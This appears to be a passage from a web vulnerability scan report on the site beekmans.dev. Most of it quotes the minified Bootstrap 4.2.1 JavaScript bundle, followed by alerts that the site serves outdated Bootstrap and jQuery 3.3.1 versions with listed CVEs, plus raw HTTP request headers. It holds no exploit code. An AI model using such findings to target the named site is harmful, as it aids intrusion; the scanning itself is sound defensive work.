n=p.Event(nn.SHOW,{relatedTarget:t});p(this._element).trigger(n),this._isShown||n.isDefaultPrevented()||(this._isShown=!0,this._checkScrollbar(),this._setScrollbar(),this._adjustDialog(),this._setEscapeEvent(),this._setResizeEvent(),p(this._element).on(nn.CLICK_DISMISS,un,function(t){return e.hide(t)}),p(this._dialog).on(nn.MOUSEDOWN_DISMISS,function(){p(e._element).one(nn.MOUSEUP_DISMISS,function(t){p(t.target).is(e._element)&&(e._ignoreBackdropClick=!0)})}),this._showBackdrop(function(){return e._showElement(t)}))}},t.hide=function(t){var e=this;if(t&&t.preventDefault(),this._isShown&&!this._isTransitioning){var n=p.Event(nn.HIDE);if(p(this._element).trigger(n),this._isShown&&!n.isDefaultPrevented()){this._isShown=!1;var i=p(this._element).hasClass(an);if(i&&(this._isTransitioning=!0),this._setEscapeEvent(),this._setResizeEvent(),p(document).off(nn.FOCUSIN),p(this._element).removeClass(ln),p(this._element).off(nn.CLICK_DISMISS),p(this._dialog).off(nn.MOUSEDOWN_DISMISS),i){var o=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,function(t){return e._hideModal(t)}).emulateTransitionEnd(o)}else this._hideModal()}}},t.dispose=function(){[window,this._element,this._dialog].forEach(function(t){return p(t).off(Ze)}),p(document).off(nn.FOCUSIN),p.removeData(this._element,Je),this._config=null,this._element=null,this._dialog=null,this._backdrop=null,this._isShown=null,this._isBodyOverflowing=null,this._ignoreBackdropClick=null,this._isTransitioning=null,this._scrollbarWidth=null},t.handleUpdate=function(){this._adjustDialog()},t._getConfig=function(t){return t=l({},tn,t),m.typeCheckConfig(Ge,t,en),t},t._showElement=function(t){var e=this,n=p(this._element).hasClass(an);this._element.parentNode&&this._element.parentNode.nodeType===Node.ELEMENT_NODE||document.body.appendChild(this._element),this._element.style.display="block",this._element.removeAttribute("aria-hidden"),this._element.setAttribute("aria-modal",!0),this._element.scrollTop=0,n&&m.reflow(this._element),p(this._element).addClass(ln),this._config.focus&&this._enforceFocus();var i=p.Event(nn.SHOWN,{relatedTarget:t}),o=function(){e._config.focus&&e._element.focus(),e._isTransitioning=!1,p(e._element).trigger(i)};if(n){var r=m.getTransitionDurationFromElement(this._dialog);p(this._dialog).one(m.TRANSITION_END,o).emulateTransitionEnd(r)}else o()},t._enforceFocus=function(){var e=this;p(document).off(nn.FOCUSIN).on(nn.FOCUSIN,function(t){document!==t.target&&e._element!==t.target&&0===p(e._element).has(t.target).length&&e._element.focus()})},t._setEscapeEvent=function(){var e=this;this._isShown&&this._config.keyboard?p(this._element).on(nn.KEYDOWN_DISMISS,function(t){27===t.which&&(t.preventDefault(),e.hide())}):this._isShown||p(this._element).off(nn.KEYDOWN_DISMISS)},t._setResizeEvent=function(){var e=this;this._isShown?p(window).on(nn.RESIZE,function(t){return e.handleUpdate(t)}):p(window).off(nn.RESIZE)},t._hideModal=function(){var t=this;this._element.style.display="none",this._element.setAttribute("aria-hidden",!0),this._element.removeAttribute("aria-modal"),this._isTransitioning=!1,this._showBackdrop(function(){p(document.body).removeClass(sn),t._resetAdjustments(),t._resetScrollbar(),p(t._element).trigger(nn.HIDDEN)})},t._removeBackdrop=function(){this._backdrop&&(p(this._backdrop).remove(),this._backdrop=null)},t._showBackdrop=function(t){var e=this,n=p(this._element).hasClass(an)?an:"";if(this._isShown&&this._config.backdrop){if(this._backdrop=document.createElement("div"),this._backdrop.className=rn,n&&this._backdrop.classList.add(n),p(this._backdrop).appendTo(document.body),p(this._element).on(nn.CLICK_DISMISS,function(t){e._ignoreBackdropClick?e._ignoreBackdropClick=!1:t.target===t.currentTarget&&("static"===e._config.backdrop?e._element.focus():e.hide())}),n&&m.reflow(this._backdrop),p(this._backdrop).addClass(ln),!t)return;if(!n)return void t();var i=m.getTransitionDurationFromElement(this._backdrop);p(this._backdrop).one(m.TRANSITION_END,t).emulateTransitionEnd(i)}else if(!this._isShown&&this._backdrop){p(this._backdrop).removeClass(ln);var o=function(){e._removeBackdrop(),t&&t()};if(p(this._element).hasClass(an)){var r=m.getTransitionDurationFromElement(this._backdrop);p(this._backdrop).one(m.TRANSITION_END,o).emulateTransitionEnd(r)}else o()}else t&&t()},t._adjustDialog=function(){var t=this._element.scrollHeight>document.documentElement.clientHeight;!this._isBodyOverflowing&&t&&(this._element.style.paddingLeft=this._scrollbarWidth+"px"),this._isBodyOverflowing&&!t&&(this._element.style.paddingRight=this._scrollbarWidth+"px")},t._resetAdjustments=function(){this._element.style.paddingLeft="",this._element.style.paddingRight=""},t._checkScrollbar=function(){var t=document.body.getBoundingClientRect();this._isBodyOverflowing=t.left+t.right<window.innerWidth,this._scrollbarWidth=this._getScrollbarWidth()},t._setScrollbar=function(){var o=this;if(this._isBodyOverflowing){var t=[].slice.call(document.querySelectorAll(fn)),e=[].slice.call(document.querySelectorAll(dn));p(t).each(function(t,e){var n=e.style.paddingRight,i=p(e).css("padding-right");p(e).data("padding-right",n).css("padding-right",parseFloat(i)+o._scrollbarWidth+"px")}),p(e).each(function(t,e){var n=e.style.marginRight,i=p(e).css("margin-right");p(e).data("margin-right",n).css("margin-right",parseFloat(i)-o._scrollbarWidth+"px")});var n=document.body.style.paddingRight,i=p(document.body).css("padding-right");p(document.body).data("padding-right",n).css("padding-right",parseFloat(i)+this._scrollbarWidth+"px")}p(document.body).addClass(sn)},t._resetScrollbar=function(){var t=[].slice.call(document.querySelectorAll(fn));p(t).each(function(t,e){var n=p(e).data("padding-right");p(e).removeData("padding-right"),e.style.paddingRight=n||""});var e=[].slice.call(document.querySelectorAll(""+dn));p(e).each(function(t,e){var n=p(e).data("margin-right");"undefined"!=typeof n&&p(e).css("margin-right",n).removeData("margin-right")});var n=p(document.body).data("padding-right");p(document.body).removeData("padding-right"),document.body.style.paddingRight=n||""},t._getScrollbarWidth=function(){var t=document.createElement("div");t.className=on,document.body.appendChild(t);var e=t.getBoundingClientRect().width-t.clientWidth;return document.body.removeChild(t),e},o._jQueryInterface=function(n,i){return this.each(function(){var t=p(this).data(Je),e=l({},tn,p(this).data(),"object"==typeof n&&n?n:{});if(t||(t=new o(this,e),p(this).data(Je,t)),"string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n](i)}else e.show&&t.show(i)})},s(o,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return tn}}]),o}();p(document).on(nn.CLICK_DATA_API,hn,function(t){var e,n=this,i=m.getSelectorFromElement(this);i&&(e=document.querySelector(i));var o=p(e).data(Je)?"toggle":l({},p(e).data(),p(this).data());"A"!==this.tagName&&"AREA"!==this.tagName||t.preventDefault();var r=p(e).one(nn.SHOW,function(t){t.isDefaultPrevented()||r.one(nn.HIDDEN,function(){p(n).is(":visible")&&n.focus()})});pn._jQueryInterface.call(p(e),o,this)}),p.fn[Ge]=pn._jQueryInterface,p.fn[Ge].Constructor=pn,p.fn[Ge].noConflict=function(){return p.fn[Ge]=$e,pn._jQueryInterface};var mn="tooltip",gn="bs.tooltip",_n="."+gn,vn=p.fn[mn],yn="bs-tooltip",En=new RegExp("(^|\\s)"+yn+"\\S+","g"),bn={animation:"boolean",template:"string",title:"(string|element|function)",trigger:"string",delay:"(number|object)",html:"boolean",selector:"(string|boolean)",placement:"(string|function)",offset:"(number|string)",container:"(string|element|boolean)",fallbackPlacement:"(string|array)",boundary:"(string|element)"},wn={AUTO:"auto",TOP:"top",RIGHT:"right",BOTTOM:"bottom",LEFT:"left"},Tn={animation:!0,template:'<div class="tooltip" role="tooltip"><div class="arrow"></div><div class="tooltip-inner"></div></div>',trigger:"hover focus",title:"",delay:0,html:!1,selector:!1,placement:"top",offset:0,container:!1,fallbackPlacement:"flip",boundary:"scrollParent"},Cn="show",Sn="out",Dn={HIDE:"hide"+_n,HIDDEN:"hidden"+_n,SHOW:"show"+_n,SHOWN:"shown"+_n,INSERTED:"inserted"+_n,CLICK:"click"+_n,FOCUSIN:"focusin"+_n,FOCUSOUT:"focusout"+_n,MOUSEENTER:"mouseenter"+_n,MOUSELEAVE:"mouseleave"+_n},In="fade",An="show",On=".tooltip-inner",Nn=".arrow",kn="hover",Ln="focus",Pn="click",xn="manual",Hn=function(){function i(t,e){if("undefined"==typeof be)throw new TypeError("Bootstrap's tooltips require Popper.js (https://popper.js.org/)");this._isEnabled=!0,this._timeout=0,this._hoverState="",this._activeTrigger={},this._popper=null,this.element=t,this.config=this._getConfig(e),this.tip=null,this._setListeners()}var t=i.prototype;return t.enable=function(){this._isEnabled=!0},t.disable=function(){this._isEnabled=!1},t.toggleEnabled=function(){this._isEnabled=!this._isEnabled},t.toggle=function(t){if(this._isEnabled)if(t){var e=this.constructor.DATA_KEY,n=p(t.currentTarget).data(e);n||(n=new this.constructor(t.currentTarget,this._getDelegateConfig()),p(t.currentTarget).data(e,n)),n._activeTrigger.click=!n._activeTrigger.click,n._isWithActiveTrigger()?n._enter(null,n):n._leave(null,n)}else{if(p(this.getTipElement()).hasClass(An))return void this._leave(null,this);this._enter(null,this)}},t.dispose=function(){clearTimeout(this._timeout),p.removeData(this.element,this.constructor.DATA_KEY),p(this.element).off(this.constructor.EVENT_KEY),p(this.element).closest(".modal").off("hide.bs.modal"),this.tip&&p(this.tip).remove(),this._isEnabled=null,this._timeout=null,this._hoverState=null,(this._activeTrigger=null)!==this._popper&&this._popper.destroy(),this._popper=null,this.element=null,this.config=null,this.tip=null},t.show=function(){var e=this;if("none"===p(this.element).css("display"))throw new Error("Please use show on visible elements");var t=p.Event(this.constructor.Event.SHOW);if(this.isWithContent()&&this._isEnabled){p(this.element).trigger(t);var n=m.findShadowRoot(this.element),i=p.contains(null!==n?n:this.element.ownerDocument.documentElement,this.element);if(t.isDefaultPrevented()||!i)return;var o=this.getTipElement(),r=m.getUID(this.constructor.NAME);o.setAttribute("id",r),this.element.setAttribute("aria-describedby",r),this.setContent(),this.config.animation&&p(o).addClass(In);var s="function"==typeof this.config.placement?this.config.placement.call(this,o,this.element):this.config.placement,a=this._getAttachment(s);this.addAttachmentClass(a);var l=this._getContainer();p(o).data(this.constructor.DATA_KEY,this),p.contains(this.element.ownerDocument.documentElement,this.tip)||p(o).appendTo(l),p(this.element).trigger(this.constructor.Event.INSERTED),this._popper=new be(this.element,o,{placement:a,modifiers:{offset:{offset:this.config.offset},flip:{behavior:this.config.fallbackPlacement},arrow:{element:Nn},preventOverflow:{boundariesElement:this.config.boundary}},onCreate:function(t){t.originalPlacement!==t.placement&&e._handlePopperPlacementChange(t)},onUpdate:function(t){return e._handlePopperPlacementChange(t)}}),p(o).addClass(An),"ontouchstart"in document.documentElement&&p(document.body).children().on("mouseover",null,p.noop);var c=function(){e.config.animation&&e._fixTransition();var t=e._hoverState;e._hoverState=null,p(e.element).trigger(e.constructor.Event.SHOWN),t===Sn&&e._leave(null,e)};if(p(this.tip).hasClass(In)){var h=m.getTransitionDurationFromElement(this.tip);p(this.tip).one(m.TRANSITION_END,c).emulateTransitionEnd(h)}else c()}},t.hide=function(t){var e=this,n=this.getTipElement(),i=p.Event(this.constructor.Event.HIDE),o=function(){e._hoverState!==Cn&&n.parentNode&&n.parentNode.removeChild(n),e._cleanTipClass(),e.element.removeAttribute("aria-describedby"),p(e.element).trigger(e.constructor.Event.HIDDEN),null!==e._popper&&e._popper.destroy(),t&&t()};if(p(this.element).trigger(i),!i.isDefaultPrevented()){if(p(n).removeClass(An),"ontouchstart"in document.documentElement&&p(document.body).children().off("mouseover",null,p.noop),this._activeTrigger[Pn]=!1,this._activeTrigger[Ln]=!1,this._activeTrigger[kn]=!1,p(this.tip).hasClass(In)){var r=m.getTransitionDurationFromElement(n);p(n).one(m.TRANSITION_END,o).emulateTransitionEnd(r)}else o();this._hoverState=""}},t.update=function(){null!==this._popper&&this._popper.scheduleUpdate()},t.isWithContent=function(){return Boolean(this.getTitle())},t.addAttachmentClass=function(t){p(this.getTipElement()).addClass(yn+"-"+t)},t.getTipElement=function(){return this.tip=this.tip||p(this.config.template)[0],this.tip},t.setContent=function(){var t=this.getTipElement();this.setElementContent(p(t.querySelectorAll(On)),this.getTitle()),p(t).removeClass(In+" "+An)},t.setElementContent=function(t,e){var n=this.config.html;"object"==typeof e&&(e.nodeType||e.jquery)?n?p(e).parent().is(t)||t.empty().append(e):t.text(p(e).text()):t[n?"html":"text"](e)},t.getTitle=function(){var t=this.element.getAttribute("data-original-title");return t||(t="function"==typeof this.config.title?this.config.title.call(this.element):this.config.title),t},t._getContainer=function(){return!1===this.config.container?document.body:m.isElement(this.config.container)?p(this.config.container):p(document).find(this.config.container)},t._getAttachment=function(t){return wn[t.toUpperCase()]},t._setListeners=function(){var i=this;this.config.trigger.split(" ").forEach(function(t){if("click"===t)p(i.element).on(i.constructor.Event.CLICK,i.config.selector,function(t){return i.toggle(t)});else if(t!==xn){var e=t===kn?i.constructor.Event.MOUSEENTER:i.constructor.Event.FOCUSIN,n=t===kn?i.constructor.Event.MOUSELEAVE:i.constructor.Event.FOCUSOUT;p(i.element).on(e,i.config.selector,function(t){return i._enter(t)}).on(n,i.config.selector,function(t){return i._leave(t)})}}),p(this.element).closest(".modal").on("hide.bs.modal",function(){i.element&&i.hide()}),this.config.selector?this.config=l({},this.config,{trigger:"manual",selector:""}):this._fixTitle()},t._fixTitle=function(){var t=typeof this.element.getAttribute("data-original-title");(this.element.getAttribute("title")||"string"!==t)&&(this.element.setAttribute("data-original-title",this.element.getAttribute("title")||""),this.element.setAttribute("title",""))},t._enter=function(t,e){var n=this.constructor.DATA_KEY;(e=e||p(t.currentTarget).data(n))||(e=new this.constructor(t.currentTarget,this._getDelegateConfig()),p(t.currentTarget).data(n,e)),t&&(e._activeTrigger["focusin"===t.type?Ln:kn]=!0),p(e.getTipElement()).hasClass(An)||e._hoverState===Cn?e._hoverState=Cn:(clearTimeout(e._timeout),e._hoverState=Cn,e.config.delay&&e.config.delay.show?e._timeout=setTimeout(function(){e._hoverState===Cn&&e.show()},e.config.delay.show):e.show())},t._leave=function(t,e){var n=this.constructor.DATA_KEY;(e=e||p(t.currentTarget).data(n))||(e=new this.constructor(t.currentTarget,this._getDelegateConfig()),p(t.currentTarget).data(n,e)),t&&(e._activeTrigger["focusout"===t.type?Ln:kn]=!1),e._isWithActiveTrigger()||(clearTimeout(e._timeout),e._hoverState=Sn,e.config.delay&&e.config.delay.hide?e._timeout=setTimeout(function(){e._hoverState===Sn&&e.hide()},e.config.delay.hide):e.hide())},t._isWithActiveTrigger=function(){for(var t in this._activeTrigger)if(this._activeTrigger[t])return!0;return!1},t._getConfig=function(t){return"number"==typeof(t=l({},this.constructor.Default,p(this.element).data(),"object"==typeof t&&t?t:{})).delay&&(t.delay={show:t.delay,hide:t.delay}),"number"==typeof t.title&&(t.title=t.title.toString()),"number"==typeof t.content&&(t.content=t.content.toString()),m.typeCheckConfig(mn,t,this.constructor.DefaultType),t},t._getDelegateConfig=function(){var t={};if(this.config)for(var e in this.config)this.constructor.Default[e]!==this.config[e]&&(t[e]=this.config[e]);return t},t._cleanTipClass=function(){var t=p(this.getTipElement()),e=t.attr("class").match(En);null!==e&&e.length&&t.removeClass(e.join(""))},t._handlePopperPlacementChange=function(t){var e=t.instance;this.tip=e.popper,this._cleanTipClass(),this.addAttachmentClass(this._getAttachment(t.placement))},t._fixTransition=function(){var t=this.getTipElement(),e=this.config.animation;null===t.getAttribute("x-placement")&&(p(t).removeClass(In),this.config.animation=!1,this.hide(),this.show(),this.config.animation=e)},i._jQueryInterface=function(n){return this.each(function(){var t=p(this).data(gn),e="object"==typeof n&&n;if((t||!/dispose|hide/.test(n))&&(t||(t=new i(this,e),p(this).data(gn,t)),"string"==typeof n)){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return Tn}},{key:"NAME",get:function(){return mn}},{key:"DATA_KEY",get:function(){return gn}},{key:"Event",get:function(){return Dn}},{key:"EVENT_KEY",get:function(){return _n}},{key:"DefaultType",get:function(){return bn}}]),i}();p.fn[mn]=Hn._jQueryInterface,p.fn[mn].Constructor=Hn,p.fn[mn].noConflict=function(){return p.fn[mn]=vn,Hn._jQueryInterface};var jn="popover",Rn="bs.popover",Fn="."+Rn,Mn=p.fn[jn],Wn="bs-popover",Un=new RegExp("(^|\\s)"+Wn+"\\S+","g"),Bn=l({},Hn.Default,{placement:"right",trigger:"click",content:"",template:'<div class="popover" role="tooltip"><div class="arrow"></div><h3 class="popover-header"></h3><div class="popover-body"></div></div>'}),qn=l({},Hn.DefaultType,{content:"(string|element|function)"}),Kn="fade",Qn="show",Yn=".popover-header",Vn=".popover-body",Xn={HIDE:"hide"+Fn,HIDDEN:"hidden"+Fn,SHOW:"show"+Fn,SHOWN:"shown"+Fn,INSERTED:"inserted"+Fn,CLICK:"click"+Fn,FOCUSIN:"focusin"+Fn,FOCUSOUT:"focusout"+Fn,MOUSEENTER:"mouseenter"+Fn,MOUSELEAVE:"mouseleave"+Fn},zn=function(t){var e,n;function i(){return t.apply(this,arguments)||this}n=t,(e=i).prototype=Object.create(n.prototype),(e.prototype.constructor=e).__proto__=n;var o=i.prototype;return o.isWithContent=function(){return this.getTitle()||this._getContent()},o.addAttachmentClass=function(t){p(this.getTipElement()).addClass(Wn+"-"+t)},o.getTipElement=function(){return this.tip=this.tip||p(this.config.template)[0],this.tip},o.setContent=function(){var t=p(this.getTipElement());this.setElementContent(t.find(Yn),this.getTitle());var e=this._getContent();"function"==typeof e&&(e=e.call(this.element)),this.setElementContent(t.find(Vn),e),t.removeClass(Kn+" "+Qn)},o._getContent=function(){return this.element.getAttribute("data-content")||this.config.content},o._cleanTipClass=function(){var t=p(this.getTipElement()),e=t.attr("class").match(Un);null!==e&&0<e.length&&t.removeClass(e.join(""))},i._jQueryInterface=function(n){return this.each(function(){var t=p(this).data(Rn),e="object"==typeof n?n:null;if((t||!/dispose|hide/.test(n))&&(t||(t=new i(this,e),p(this).data(Rn,t)),"string"==typeof n)){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return Bn}},{key:"NAME",get:function(){return jn}},{key:"DATA_KEY",get:function(){return Rn}},{key:"Event",get:function(){return Xn}},{key:"EVENT_KEY",get:function(){return Fn}},{key:"DefaultType",get:function(){return qn}}]),i}(Hn);p.fn[jn]=zn._jQueryInterface,p.fn[jn].Constructor=zn,p.fn[jn].noConflict=function(){return p.fn[jn]=Mn,zn._jQueryInterface};var Gn="scrollspy",Jn="bs.scrollspy",Zn="."+Jn,$n=p.fn[Gn],ti={offset:10,method:"auto",target:""},ei={offset:"number",method:"string",target:"(string|element)"},ni={ACTIVATE:"activate"+Zn,SCROLL:"scroll"+Zn,LOAD_DATA_API:"load"+Zn+".data-api"},ii="dropdown-item",oi="active",ri='[data-spy="scroll"]',si=".nav, .list-group",ai=".nav-link",li=".nav-item",ci=".list-group-item",hi=".dropdown",ui=".dropdown-item",fi=".dropdown-toggle",di="offset",pi="position",mi=function(){function n(t,e){var n=this;this._element=t,this._scrollElement="BODY"===t.tagName?window:t,this._config=this._getConfig(e),this._selector=this._config.target+" "+ai+","+this._config.target+" "+ci+","+this._config.target+" "+ui,this._offsets=[],this._targets=[],this._activeTarget=null,this._scrollHeight=0,p(this._scrollElement).on(ni.SCROLL,function(t){return n._process(t)}),this.refresh(),this._process()}var t=n.prototype;return t.refresh=function(){var e=this,t=this._scrollElement===this._scrollElement.window?di:pi,o="auto"===this._config.method?t:this._config.method,r=o===pi?this._getScrollTop():0;this._offsets=[],this._targets=[],this._scrollHeight=this._getScrollHeight(),[].slice.call(document.querySelectorAll(this._selector)).map(function(t){var e,n=m.getSelectorFromElement(t);if(n&&(e=document.querySelector(n)),e){var i=e.getBoundingClientRect();if(i.width||i.height)return[p(e)[o]().top+r,n]}return null}).filter(function(t){return t}).sort(function(t,e){return t[0]-e[0]}).forEach(function(t){e._offsets.push(t[0]),e._targets.push(t[1])})},t.dispose=function(){p.removeData(this._element,Jn),p(this._scrollElement).off(Zn),this._element=null,this._scrollElement=null,this._config=null,this._selector=null,this._offsets=null,this._targets=null,this._activeTarget=null,this._scrollHeight=null},t._getConfig=function(t){if("string"!=typeof(t=l({},ti,"object"==typeof t&&t?t:{})).target){var e=p(t.target).attr("id");e||(e=m.getUID(Gn),p(t.target).attr("id",e)),t.target="#"+e}return m.typeCheckConfig(Gn,t,ei),t},t._getScrollTop=function(){return this._scrollElement===window?this._scrollElement.pageYOffset:this._scrollElement.scrollTop},t._getScrollHeight=function(){return this._scrollElement.scrollHeight||Math.max(document.body.scrollHeight,document.documentElement.scrollHeight)},t._getOffsetHeight=function(){return this._scrollElement===window?window.innerHeight:this._scrollElement.getBoundingClientRect().height},t._process=function(){var t=this._getScrollTop()+this._config.offset,e=this._getScrollHeight(),n=this._config.offset+e-this._getOffsetHeight();if(this._scrollHeight!==e&&this.refresh(),n<=t){var i=this._targets[this._targets.length-1];this._activeTarget!==i&&this._activate(i)}else{if(this._activeTarget&&t<this._offsets[0]&&0<this._offsets[0])return this._activeTarget=null,void this._clear();for(var o=this._offsets.length;o--;){this._activeTarget!==this._targets[o]&&t>=this._offsets[o]&&("undefined"==typeof this._offsets[o+1]||t<this._offsets[o+1])&&this._activate(this._targets[o])}}},t._activate=function(e){this._activeTarget=e,this._clear();var t=this._selector.split(",").map(function(t){return t+'[data-target="'+e+'"],'+t+'[href="'+e+'"]'}),n=p([].slice.call(document.querySelectorAll(t.join(","))));n.hasClass(ii)?(n.closest(hi).find(fi).addClass(oi),n.addClass(oi)):(n.addClass(oi),n.parents(si).prev(ai+", "+ci).addClass(oi),n.parents(si).prev(li).children(ai).addClass(oi)),p(this._scrollElement).trigger(ni.ACTIVATE,{relatedTarget:e})},t._clear=function(){[].slice.call(document.querySelectorAll(this._selector)).filter(function(t){return t.classList.contains(oi)}).forEach(function(t){return t.classList.remove(oi)})},n._jQueryInterface=function(e){return this.each(function(){var t=p(this).data(Jn);if(t||(t=new n(this,"object"==typeof e&&e),p(this).data(Jn,t)),"string"==typeof e){if("undefined"==typeof t[e])throw new TypeError('No method named "'+e+'"');t[e]()}})},s(n,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"Default",get:function(){return ti}}]),n}();p(window).on(ni.LOAD_DATA_API,function(){for(var t=[].slice.call(document.querySelectorAll(ri)),e=t.length;e--;){var n=p(t[e]);mi._jQueryInterface.call(n,n.data())}}),p.fn[Gn]=mi._jQueryInterface,p.fn[Gn].Constructor=mi,p.fn[Gn].noConflict=function(){return p.fn[Gn]=$n,mi._jQueryInterface};var gi="bs.tab",_i="."+gi,vi=p.fn.tab,yi={HIDE:"hide"+_i,HIDDEN:"hidden"+_i,SHOW:"show"+_i,SHOWN:"shown"+_i,CLICK_DATA_API:"click"+_i+".data-api"},Ei="dropdown-menu",bi="active",wi="disabled",Ti="fade",Ci="show",Si=".dropdown",Di=".nav, .list-group",Ii=".active",Ai="> li > .active",Oi='[data-toggle="tab"], [data-toggle="pill"], [data-toggle="list"]',Ni=".dropdown-toggle",ki="> .dropdown-menu .active",Li=function(){function i(t){this._element=t}var t=i.prototype;return t.show=function(){var n=this;if(!(this._element.parentNode&&this._element.parentNode.nodeType===Node.ELEMENT_NODE&&p(this._element).hasClass(bi)||p(this._element).hasClass(wi))){var t,i,e=p(this._element).closest(Di)[0],o=m.getSelectorFromElement(this._element);if(e){var r="UL"===e.nodeName||"OL"===e.nodeName?Ai:Ii;i=(i=p.makeArray(p(e).find(r)))[i.length-1]}var s=p.Event(yi.HIDE,{relatedTarget:this._element}),a=p.Event(yi.SHOW,{relatedTarget:i});if(i&&p(i).trigger(s),p(this._element).trigger(a),!a.isDefaultPrevented()&&!s.isDefaultPrevented()){o&&(t=document.querySelector(o)),this._activate(this._element,e);var l=function(){var t=p.Event(yi.HIDDEN,{relatedTarget:n._element}),e=p.Event(yi.SHOWN,{relatedTarget:i});p(i).trigger(t),p(n._element).trigger(e)};t?this._activate(t,t.parentNode,l):l()}}},t.dispose=function(){p.removeData(this._element,gi),this._element=null},t._activate=function(t,e,n){var i=this,o=(!e||"UL"!==e.nodeName&&"OL"!==e.nodeName?p(e).children(Ii):p(e).find(Ai))[0],r=n&&o&&p(o).hasClass(Ti),s=function(){return i._transitionComplete(t,o,n)};if(o&&r){var a=m.getTransitionDurationFromElement(o);p(o).removeClass(Ci).one(m.TRANSITION_END,s).emulateTransitionEnd(a)}else s()},t._transitionComplete=function(t,e,n){if(e){p(e).removeClass(bi);var i=p(e.parentNode).find(ki)[0];i&&p(i).removeClass(bi),"tab"===e.getAttribute("role")&&e.setAttribute("aria-selected",!1)}if(p(t).addClass(bi),"tab"===t.getAttribute("role")&&t.setAttribute("aria-selected",!0),m.reflow(t),p(t).addClass(Ci),t.parentNode&&p(t.parentNode).hasClass(Ei)){var o=p(t).closest(Si)[0];if(o){var r=[].slice.call(o.querySelectorAll(Ni));p(r).addClass(bi)}t.setAttribute("aria-expanded",!0)}n&&n()},i._jQueryInterface=function(n){return this.each(function(){var t=p(this),e=t.data(gi);if(e||(e=new i(this),t.data(gi,e)),"string"==typeof n){if("undefined"==typeof e[n])throw new TypeError('No method named "'+n+'"');e[n]()}})},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}}]),i}();p(document).on(yi.CLICK_DATA_API,Oi,function(t){t.preventDefault(),Li._jQueryInterface.call(p(this),"show")}),p.fn.tab=Li._jQueryInterface,p.fn.tab.Constructor=Li,p.fn.tab.noConflict=function(){return p.fn.tab=vi,Li._jQueryInterface};var Pi="toast",xi="bs.toast",Hi="."+xi,ji=p.fn[Pi],Ri={CLICK_DISMISS:"click.dismiss"+Hi,HIDE:"hide"+Hi,HIDDEN:"hidden"+Hi,SHOW:"show"+Hi,SHOWN:"shown"+Hi},Fi="fade",Mi="hide",Wi="show",Ui="showing",Bi={animation:"boolean",autohide:"boolean",delay:"number"},qi={animation:!0,autohide:!0,delay:500},Ki='[data-dismiss="toast"]',Qi=function(){function i(t,e){this._element=t,this._config=this._getConfig(e),this._timeout=null,this._setListeners()}var t=i.prototype;return t.show=function(){var t=this;p(this._element).trigger(Ri.SHOW),this._config.animation&&this._element.classList.add(Fi);var e=function(){t._element.classList.remove(Ui),t._element.classList.add(Wi),p(t._element).trigger(Ri.SHOWN),t._config.autohide&&t.hide()};if(this._element.classList.remove(Mi),this._element.classList.add(Ui),this._config.animation){var n=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,e).emulateTransitionEnd(n)}else e()},t.hide=function(t){var e=this;this._element.classList.contains(Wi)&&(p(this._element).trigger(Ri.HIDE),t?this._close():this._timeout=setTimeout(function(){e._close()},this._config.delay))},t.dispose=function(){clearTimeout(this._timeout),this._timeout=null,this._element.classList.contains(Wi)&&this._element.classList.remove(Wi),p(this._element).off(Ri.CLICK_DISMISS),p.removeData(this._element,xi),this._element=null,this._config=null},t._getConfig=function(t){return t=l({},qi,p(this._element).data(),"object"==typeof t&&t?t:{}),m.typeCheckConfig(Pi,t,this.constructor.DefaultType),t},t._setListeners=function(){var t=this;p(this._element).on(Ri.CLICK_DISMISS,Ki,function(){return t.hide(!0)})},t._close=function(){var t=this,e=function(){t._element.classList.add(Mi),p(t._element).trigger(Ri.HIDDEN)};if(this._element.classList.remove(Wi),this._config.animation){var n=m.getTransitionDurationFromElement(this._element);p(this._element).one(m.TRANSITION_END,e).emulateTransitionEnd(n)}else e()},i._jQueryInterface=function(n){return this.each(function(){var t=p(this),e=t.data(xi);if(e||(e=new i(this,"object"==typeof n&&n),t.data(xi,e)),"string"==typeof n){if("undefined"==typeof e[n])throw new TypeError('No method named "'+n+'"');e[n](this)}})},s(i,null,[{key:"VERSION",get:function(){return"4.2.1"}},{key:"DefaultType",get:function(){return Bi}}]),i}();p.fn[Pi]=Qi._jQueryInterface,p.fn[Pi].Constructor=Qi,p.fn[Pi].noConflict=function(){return p.fn[Pi]=ji,Qi._jQueryInterface},function(){if("undefined"==typeof p)throw new TypeError("Bootstrap's JavaScript requires jQuery. jQuery must be included before Bootstrap's JavaScript.");var t=p.fn.jquery.split(" ")[0].split(".");if(t[0]<2&&t[1]<9||1===t[0]&&9===t[1]&&t[2]<1||4<=t[0])throw new Error("Bootstrap's JavaScript requires at least jQuery v1.9.1 but less than v4.0.0")}(),t.Util=m,t.Alert=g,t.Button=k,t.Carousel=at,t.Collapse=Tt,t.Dropdown=ze,t.Modal=pn,t.Popover=zn,t.Scrollspy=mi,t.Tab=Li,t.Toast=Qi,t.Tooltip=Hn,Object.defineProperty(t,"__esModule",{value:!0})});
          //# sourceMappingURL=bootstrap.bundle.min.js.map
          Evidence
          * Bootstrap v4.2.1
          Solution

          Please upgrade to the latest version of bootstrap.

        2. GET https://beekmans.dev/vendor/jquery/jquery.min.js
          Alert tags
          Alert description

          The identified library jquery, version 3.3.1 is vulnerable.

          Other info

          CVE-2020-11023

          CVE-2020-11022

          CVE-2019-11358

          Request
          Request line and header section (269 bytes)
          GET https://beekmans.dev/vendor/jquery/jquery.min.js HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
          Accept: */*
          Accept-Language: en-US,en;q=0.5
          Referer: https://beekmans.dev/
          Connection: keep-alive
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1161 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:18 GMT
          Content-Type: application/javascript; charset=utf-8
          Connection: keep-alive
          last-modified: Fri, 15 Mar 2019 09:41:18 GMT
          etag: W/"1538f-5841ed7427482-gzip"
